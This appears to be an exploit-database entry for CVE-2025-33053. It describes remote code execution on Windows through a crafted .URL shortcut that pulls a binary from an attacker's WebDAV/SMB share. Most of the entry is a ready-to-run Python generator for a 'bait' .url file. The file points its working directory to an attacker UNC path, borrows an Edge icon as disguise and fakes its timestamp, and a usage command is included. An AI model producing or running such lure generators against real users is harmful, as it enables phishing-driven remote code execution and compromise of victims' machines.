Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()